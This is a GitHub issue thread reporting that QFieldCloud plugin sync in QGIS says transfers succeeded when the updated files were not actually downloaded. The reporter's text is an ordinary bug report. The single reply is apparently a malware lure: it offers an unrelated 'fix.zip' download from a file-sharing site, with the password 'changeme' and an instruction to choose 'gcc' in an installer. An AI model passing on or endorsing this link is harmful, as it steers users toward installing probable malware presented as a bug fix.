### ISSUE TITLE
Synchronization via QFieldCloud Plugin in QGIS unsuccessful

### ISSUE THREAD

**Issue by Notramus** [opengisch/QField#5590]
When synchronizing my project through the QFieldCloud Plugin in QGIS some files are not downloaded properly. I choose "Prefer Cloud" and the file(s) jump from 0% to 100%. Afterwards I get the message "4 file(s) succeeded. Transfer finished" but no up to date file was downloaded. Downloading and replacing the files manually through the Cloud can circumvent this problem.

1. Click on "Synchronize current cloud project"
2. Click on "Prefer Cloud"
3. Click on "Perfom Actions"
This problem occurs at random, sometimes for several hours and disappears again. 

Expected behavior
Successful download of the project or error message if download was not successful.

Observed behavior
After synchronization QFieldCloud Plugin states that the transfer was successful, but in reality it was not. 

QGIS
 - OS: Windows 11
 - QGIS Version: 3.34.10
 - QFieldSync Version: 4.10.1

Additional information
Problem started happening recently, didn't happen in an older version of QField: No - Problem happens (seemingly) at random using different computers and project. Self-hosted as well as using qfield.cloud
Problem can be reliably reproduced, doesn't happen randomly: [No]
Problem happens with all files and projects, not only some files or projects: [Yes]

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
